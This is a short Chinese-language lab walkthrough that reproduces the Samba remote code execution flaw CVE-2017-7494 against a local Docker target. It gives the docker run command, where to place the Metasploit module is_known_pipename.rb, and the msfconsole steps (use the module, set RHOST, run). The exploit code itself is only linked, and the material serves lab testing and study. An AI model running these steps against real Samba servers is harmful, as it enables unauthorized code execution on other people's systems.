复现CVE-2017-7494&msf
Samba远程代码执行漏洞(CVE-2017-7494)分析,可靠的发现和利用Java反序列化漏洞,Pwn2own漏洞分享系列:利用macOS内核漏洞逃逸Safari沙盒 ,macOS下Nylas邮件客户端的命令执行漏洞,ios开发中常见的安全漏洞,chrome V8越界读写漏洞分析,利用可信文档实现PDF UXSS,利用DNS 隧道进行C&C通信
视频演示:
靶机环境:docker——samba
docker——samba 下载地址 https://github.com/Medicean/VulApps/tree/master/s/samba/1
攻击者:kali2017
1.使用docker搭建(linux_samba)
docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1
下载完后 ,并已经开启了docker samba。
2.使用exploit_CVE-2017-7494(msf-ruby)
CVE-2017-7494 项目地址:https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
- 手动将代码复制下来并且保存is_known_pipename.rb,以及将ruby脚本复制到 kali的/usr/share/metasploit-framework/modules/exploits/linux/samba/
2.开启msf,并使用is_known_pipename模块
msf > use exploit/linux/samba/is_known_pipename
3.我们使用options ,需要我们设置哪些参数
这边我们可以看到只需要我们设置目标ip地址即可。
3.设置靶机ip地址
set RHOST 192.168.1.102
4.执行攻击
5.验证漏洞是否利用成功
可以看到该漏洞的威力
参考:链接http://www.tuicool.com/articles/baeyYvV
https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
docker——samba 下载地址 https://github.com/Medicean/VulApps/tree/master/s/samba/1